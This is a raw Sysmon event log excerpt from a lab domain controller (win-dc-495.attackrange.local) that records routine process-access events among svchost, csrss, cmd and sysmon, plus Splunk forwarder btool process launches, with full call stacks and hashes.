13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-BB00-00000000A301}43564324C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.975{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-B700-00000000A301}6641004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.970{59A5CD1D-8EE3-6005-BB00-00000000A301}4356C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.936{59A5CD1D-8EE3-6005-BA00-00000000A301}13721752C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 